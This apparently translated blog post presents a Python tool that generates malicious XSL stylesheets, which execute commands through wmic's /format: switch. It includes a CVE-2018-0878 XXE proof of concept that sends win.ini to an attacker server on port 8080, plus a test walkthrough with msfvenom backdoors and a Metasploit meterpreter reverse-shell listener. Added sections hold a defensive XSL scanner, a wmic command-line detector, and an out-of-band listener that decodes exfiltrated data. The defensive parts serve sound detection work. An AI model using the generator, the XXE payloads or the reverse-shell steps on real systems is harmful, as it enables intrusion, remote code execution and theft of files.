Building XslGenerator in Python

Posted by 东京$

0x00 Preface

Today I loaded the RSS feed that Demon shared. One of the articles in it was by 三好学生:

After reading the article carefully I understood a few of the tricks it describes, which led to the script below.

0x01 Code


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# XslGenerator: writes XSL stylesheets that run JScript when loaded with
# "wmic ... /format:" (-b local file, -y URL-hosted file) and the
# CVE-2018-0878 XXE proof of concept (-j). Runs under Python 2 or 3.
import optparse
import os
import shutil
import socket
import sys

WEBROOT = '/var/www/html'   # Apache document root used by -y and -j


def main():
    parser = optparse.OptionParser()
    parser.add_option('-b', dest='local', action='store_true', help='Generate a local XSL (poc.xsl)')
    parser.add_option('-y', dest='Long', action='store_true', help='Generate a remote, URL-hosted XSL (Longpoc.xsl)')
    parser.add_option('-j', dest='CVE', action='store_true', help='Generate the CVE-2018-0878 XXE PoC')
    (options, args) = parser.parse_args()
    if options.local:
        Local()
    elif options.Long:
        Long()
    elif options.CVE:
        Cve()
    else:
        parser.print_help()
        sys.exit()


def Local():
    # Microsoft's own csv.xsl (shipped in System32\wbem) with one msxsl:script block added.
    # The root template calls user:myFunction(), so the JScript runs as soon as wmic applies
    # the stylesheet; the rest of the file still renders the WMI result as CSV.
    with open('poc.xsl', 'w') as l:
        l.write('''<?xml version="1.0"?>
<!-- Copyright (c) Microsoft Corporation.  All rights reserved. -->
<xsl:stylesheet version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="urn:my-scripts">
<xsl:output encoding="utf-16" omit-xml-declaration="yes"/>
<xsl:param name="norefcomma"/>

<msxsl:script language="JScript" implements-prefix="user">
   function myFunction() {
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
          return "";      
   }
</msxsl:script>

<xsl:template match="/">

<xsl:value-of select="user:myFunction()"/>

Node,<xsl:for-each select="COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.ARRAY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.REFERENCE"><xsl:value-of select="@NAME"/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each><xsl:apply-templates select="COMMAND/RESULTS"/></xsl:template> 


<xsl:template match="RESULTS" xml:space="preserve"><xsl:apply-templates select="CIM/INSTANCE"/></xsl:template> 
<xsl:template match="VALUE.ARRAY" xml:space="preserve">{<xsl:for-each select="VALUE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">;</xsl:if></xsl:for-each>}</xsl:template>
<xsl:template match="VALUE" xml:space="preserve"><xsl:value-of select="."/></xsl:template>
<xsl:template match="INSTANCE" xml:space="preserve">
<xsl:value-of select="../../@NODE"/>,<xsl:for-each select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each></xsl:template> 

<xsl:template match="PROPERTY.REFERENCE" xml:space="preserve"><xsl:apply-templates select="VALUE.REFERENCE"></xsl:apply-templates></xsl:template>

<xsl:template match="PROPERTY"><xsl:apply-templates select="VALUE"/></xsl:template>
<xsl:template match="PROPERTY.ARRAY"><xsl:for-each select="VALUE.ARRAY"><xsl:apply-templates select="."/></xsl:for-each></xsl:template>

<xsl:template match="VALUE.REFERENCE">"<xsl:apply-templates select="INSTANCEPATH/NAMESPACEPATH"/><xsl:apply-templates select="INSTANCEPATH/INSTANCENAME|INSTANCENAME"/>"</xsl:template>

<xsl:template match="NAMESPACEPATH">\\\\<xsl:value-of select="HOST/text()"/><xsl:for-each select="LOCALNAMESPACEPATH/NAMESPACE">\\<xsl:value-of select="@NAME"/></xsl:for-each>:</xsl:template>

<xsl:template match="INSTANCENAME"><xsl:value-of select="@CLASSNAME"/><xsl:for-each select="KEYBINDING"><xsl:if test="position()=1">.</xsl:if><xsl:value-of select="@NAME"/>="<xsl:value-of select="KEYVALUE/text()"/>"<xsl:if test="position()!=last()"></xsl:if><xsl:if test="not($norefcomma=&quot;true&quot;)">,</xsl:if><xsl:if test="$norefcomma=&quot;true&quot;"><xsl:text> </xsl:text></xsl:if></xsl:for-each></xsl:template>


</xsl:stylesheet>
        ''')
    print('[*] Generation complete: poc.xsl')
    print('[*] To get a Meterpreter session back, build a backdoor (e.g. with msfvenom), drop it on the target, and use modify.py to change the command that WScript.Shell runs (calc.exe by default)')
    print('[*] On the target, cd into the directory holding poc.xsl and run: wmic os get /format:poc   (wmic appends .xsl and looks in the current directory)')


def Long():
    # Minimal stylesheet meant to be fetched over HTTP. It uses the default namespace
    # (no xsl: prefix) and needs no template at all: the top-level statements of the
    # ms:script block execute when the stylesheet is loaded.
    with open('Longpoc.xsl', 'w') as g:
        g.write('''<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]> </ms:script>
</stylesheet>
        ''')
    print('[*] Generation complete: Longpoc.xsl')
    shutil.move('Longpoc.xsl', os.path.join(WEBROOT, 'Longpoc.xsl'))
    print('[*] Longpoc.xsl moved to {}'.format(WEBROOT))
    print('[*] Change the program executed in the XSL with modify.py')
    print('[*] Put the generated backdoor on the target')
    print('[*] Start the Apache service')
    print('[*] On the target run: wmic os get /format:"http://IP/Longpoc.xsl"')


def Cve():
    print('[@] Vulnerability write-up: https://www.exploit-db.com/exploits/44352/')
    # Find the local IP the target can reach: a UDP "connect" sends nothing, it only
    # asks the kernel which interface would be used to route to 8.8.8.8.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(('8.8.8.8', 80))
    ip = s.getsockname()[0]
    s.close()
    # Python 2 ships SimpleHTTPServer, Python 3 ships http.server; both serve the cwd.
    module = 'http.server' if sys.version_info[0] >= 3 else 'SimpleHTTPServer'
    ml = '%s -m %s 8080' % (sys.executable, module)
    # xxe.xml: the external DTD. %payload; holds win.ini, and %root; declares a second
    # parameter entity whose SYSTEM URL carries that content back to us on port 8080.
    # &#37; is '%', so the nested declaration is only materialised when %root; is referenced.
    with open('xxe.xml', 'w') as c:
        c.write('''<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://{}:8080/?%payload;'> ">  
        '''.format(ip))
    # payload.xsl: the file wmic loads on the target. No stylesheet body is needed: the
    # DOCTYPE is processed (and the OOB request sent) before the parser fails.
    with open('payload.xsl', 'w') as p:
        p.write('''<?xml version="1.0" encoding="UTF-8" ?>  
<!DOCTYPE zsl [  
<!ENTITY % remote SYSTEM "http://{}:8080/xxe.xml">  
%remote;%root;%oob;]>
        '''.format(ip))
    # xxe.xml must be reachable at the URL written into payload.xsl, so move it to the
    # web root and serve that directory on port 8080.
    shutil.move('xxe.xml', os.path.join(WEBROOT, 'xxe.xml'))
    print('[*] Local IP: {}'.format(ip))
    print('[*] xxe.xml created and moved to {}'.format(WEBROOT))
    print('[*] payload.xsl created. Copy it to the target and run: wmic os get /format:payload.xsl')
    print('[*] Starting an HTTP server on port 8080; the leaked win.ini shows up in its request log')
    os.chdir(WEBROOT)
    os.system(ml)


if __name__ == '__main__':
    main()
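An added example, not part of the original script, for the defensive side of the same technique: a namespace-aware scan of XSL files for the script element both payloads above rely on. The two stylesheets the generator writes look different as text (xsl:/msxsl: prefixes versus a default namespace with an ms: prefix), but after parsing they contain the same element, {urn:schemas-microsoft-com:xslt}script, so a grep for the literal string msxsl:script catches only one of them. The samples are constructed here from the two payload shapes above plus a DOCTYPE-only file in the shape of payload.xsl; the regular expression for external entity declarations is a heuristic of my own, not something the page describes.

```python
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
MSXSL_NS = "urn:schemas-microsoft-com:xslt"   # namespace of msxsl:script / ms:script

# Constructed samples, reduced to the elements that matter.
PREFIXED = '''<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:my-scripts">
<msxsl:script language="JScript" implements-prefix="user">
  function myFunction() { var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); return ""; }
</msxsl:script>
<xsl:template match="/"><xsl:value-of select="user:myFunction()"/></xsl:template>
</xsl:stylesheet>'''

DEFAULT_NS = '''<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
    xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript"><![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]></ms:script>
</stylesheet>'''

BENIGN = '''<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><xsl:value-of select="COMMAND/RESULTS"/></xsl:template>
</xsl:stylesheet>'''

PAYLOAD_XSL = '''<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.223.133:8080/xxe.xml">
%remote;%root;%oob;]>'''

# Heuristic: any entity declaration that pulls in an external resource.
ENTITY_RE = re.compile(r'<!ENTITY\s+(%\s*)?\w+\s+(SYSTEM|PUBLIC)\b', re.I)


def naive_check(text):
    """What a grep-style rule does: it only knows the conventional prefix."""
    return "msxsl:script" in text


def scan_xsl(text):
    """Namespace-aware scan. Returns a dict of findings; an empty dict means nothing suspicious."""
    findings = {}
    ext = ENTITY_RE.findall(text)
    if ext:
        findings["external_entities"] = len(ext)
    try:
        root = ET.fromstring(text)   # ElementTree never fetches external entities
    except ET.ParseError as e:
        findings["parse_error"] = str(e)   # e.g. a DOCTYPE-only file with no root element
        return findings
    scripts = []
    # Match on the namespace URI, so msxsl:script and ms:script are the same element.
    for el in root.iter("{%s}script" % MSXSL_NS):
        body = "".join(el.itertext())   # plain text and CDATA both end up here
        scripts.append({
            "language": el.get("language", "JScript"),   # MSXML defaults to JScript
            "prefix": el.get("implements-prefix"),
            "activex": "ActiveXObject" in body,
        })
    if scripts:
        findings["scripts"] = scripts
    return findings


if __name__ == "__main__":
    for name, sample in [("prefixed", PREFIXED), ("default-ns", DEFAULT_NS),
                         ("benign", BENIGN), ("payload.xsl", PAYLOAD_XSL)]:
        print(name, "grep:", naive_check(sample), "scan:", scan_xsl(sample))
```

Running it shows the grep rule passing the default-namespace payload while the scan flags both script variants, leaves the plain csv-style stylesheet clean, and reports the DOCTYPE-only file by its external entity declaration even though it does not parse.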

Test results: -b

Attacker: Ubuntu

Victim: Windows Server 2008 R2

The generated and modified XSL

shell.exe generated with msfvenom

Windows Server 2008 R2

Change into the directory containing shell.exe and run in cmd: wmic os get /format:sd

Start the listener on Ubuntu:

use exploit/multi/handler
set LHOST 192.168.223.133
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Test results: -j   CVE-2018-0878

Vulnerability details: https://www.exploit-db.com/exploits/44352/

xxe.xml and payload.xsl are generated

xxe.xml is moved to /var/www/html

payload.xsl is placed on the victim, Windows Server 2008 R2

xxe.xml:

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.223.133:8080/?%payload;'> ">  

payload.xsl:

<?xml version="1.0" encoding="UTF-8" ?>  
<!DOCTYPE zsl [  
<!ENTITY % remote SYSTEM "http://192.168.223.133:8080/xxe.xml">  
%remote;%root;%oob;]>

Start the Apache service

service apache2 start

On Windows Server 2008 R2 run:

wmic os get /format:payload.xsl

The wmic command itself fails (payload.xsl contains no stylesheet for it to apply), but the vulnerability still triggers: the DOCTYPE is processed first, so xxe.xml is fetched and the request defined by the oob entity, with win.ini in its query string, reaches the server on port 8080 before the parser gives up.
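An added example, not from the original post, that replaces SimpleHTTPServer in the -j flow with a listener which both serves xxe.xml and decodes the out-of-band request instead of leaving the leaked file percent-encoded in an access-log line. The log line below is constructed (the default win.ini of a Windows Server 2008 R2 box, percent-encoded into the query string); how the MSXML resolver actually encodes the entity value into the URL is not shown on this page, so the decoding step is illustrated under that assumption.

```python
import re
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer


def decode_exfil(request_target):
    """Recover the leaked file from a request target such as '/?%3B%20for...'.
    Returns None for anything that is not a query-only request to '/'."""
    parts = urllib.parse.urlsplit(request_target)
    if parts.path != "/" or not parts.query:
        return None
    return urllib.parse.unquote(parts.query)


def target_from_log(line):
    """Pull the request target out of a BaseHTTPServer-style access-log line."""
    m = re.search(r'"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d"', line)
    return m.group(1) if m else None


# Constructed access-log line: what SimpleHTTPServer would print for the oob request
# if the resolver percent-encodes the file content into the query string.
SAMPLE_LOG = ('192.168.223.134 - - [01/Jan/2018 00:00:00] "GET /?%3B%20for%2016-bit%20app'
              '%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D'
              '%0D%0A%5Bfiles%5D%0D%0A%5BMail%5D%0D%0AMAPI%3D1%0D%0A HTTP/1.1" 200 -')


class OOBHandler(BaseHTTPRequestHandler):
    """Serves xxe.xml from the current directory; everything else is treated as exfil."""

    def do_GET(self):
        if self.path == "/xxe.xml":
            try:
                with open("xxe.xml", "rb") as f:
                    data = f.read()
            except IOError:
                self.send_error(404)
                return
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.end_headers()
            self.wfile.write(data)
            return
        leaked = decode_exfil(self.path)
        if leaked is not None:
            print("[+] exfiltrated from %s:\n%s" % (self.client_address[0], leaked))
        self.send_response(200)   # any answer will do; the data already arrived in the URL
        self.end_headers()


def serve(port=8080):
    # Port 8080 matches the URLs written into xxe.xml and payload.xsl above.
    HTTPServer(("0.0.0.0", port), OOBHandler).serve_forever()


if __name__ == "__main__":
    print(decode_exfil(target_from_log(SAMPLE_LOG)))   # offline demonstration of the decoder
    serve()
```

Run it from the directory that holds xxe.xml in place of `python -m SimpleHTTPServer 8080`; the decoder functions can also be pointed at an existing SimpleHTTPServer log after the fact.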

I will not demonstrate the -y option here; the steps are about the same as the two above:

1. Edit the generated XSL so it runs the program you want on the target, and move it into the apache2 web root

2. Start apache2

3. Drop the generated backdoor on the target

4. Run wmic os get /format:"http://192.168.223.133/poc.xsl"

wmic then fetches the XSL and executes it. If you are listening at that moment, you receive a shell.
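An added example for the detection side, not part of the original tool: every variant on this page ends in a wmic command line whose /format: switch points at something other than a stylesheet name shipped in System32\wbem, so a triage over process-creation command lines is the cheapest check. The Sysmon-style command lines are constructed, and the list of built-in stylesheet names is my assumption about a stock install (an unknown name is only reported as "local", not as malicious).

```python
import re

# Names wmic resolves to %SystemRoot%\System32\wbem\<name>.xsl on a stock install (assumed list).
BUILTIN = {"csv", "hform", "htable", "htable-sortby", "mof", "rawxml", "texttable",
           "texttablewsys", "textvaluelist", "xml", "list", "table", "value"}

WMIC_RE = re.compile(r'(^|[\\/\s])wmic(\.exe)?\b', re.I)
# Value may be double-quoted, single-quoted, or a bare token.
FORMAT_RE = re.compile(r'''[/-]format:(?:"([^"]*)"|'([^']*)'|(\S+))''', re.I)

# Constructed Sysmon Event ID 1 CommandLine values.
SAMPLE_CMDLINES = [
    'wmic os get /format:sd',                                     # the -b test above (renamed poc.xsl)
    'wmic  os get /FORMAT:"http://192.168.223.133/poc.xsl"',      # the -y flow
    'wmic os get /format:payload.xsl',                            # the -j flow
    'C:\\Windows\\System32\\wbem\\WMIC.exe os get /format:csv',   # legitimate built-in stylesheet
    'wmic process list /format:"\\\\fileserver\\share\\x.xsl"',   # stylesheet pulled from a UNC path
    'wmic process call create "calc.exe"',                        # wmic without /format
    'whoami /all',
]


def classify_format(cmdline):
    """None if this is not a wmic /format: invocation, else 'builtin', 'remote', 'unc' or 'local'."""
    if not WMIC_RE.search(cmdline):
        return None
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    value = next(g for g in m.groups() if g is not None).strip()
    low = value.lower()
    if re.match(r'https?://', low):
        return "remote"
    if low.startswith("\\\\"):
        return "unc"
    # Bare names (no path component) that match a shipped stylesheet are the normal case;
    # anything with a path, even into wbem, is something an analyst should open.
    name = low.rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
    if name.endswith(".xsl"):
        name = name[:-4]
    if name in BUILTIN and "\\" not in low and "/" not in low:
        return "builtin"
    return "local"


def triage(cmdlines):
    """Return (cmdline, verdict) for every wmic /format: use that is not a built-in stylesheet."""
    out = []
    for c in cmdlines:
        verdict = classify_format(c)
        if verdict not in (None, "builtin"):
            out.append((c, verdict))
    return out


if __name__ == "__main__":
    for cmd, verdict in triage(SAMPLE_CMDLINES):
        print("%-8s %s" % (verdict, cmd))
```

A "remote" or "unc" verdict is worth an alert on its own; "local" needs the referenced .xsl (wmic appends the extension and searches the current directory) to be pulled from the host and scanned for a script block.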
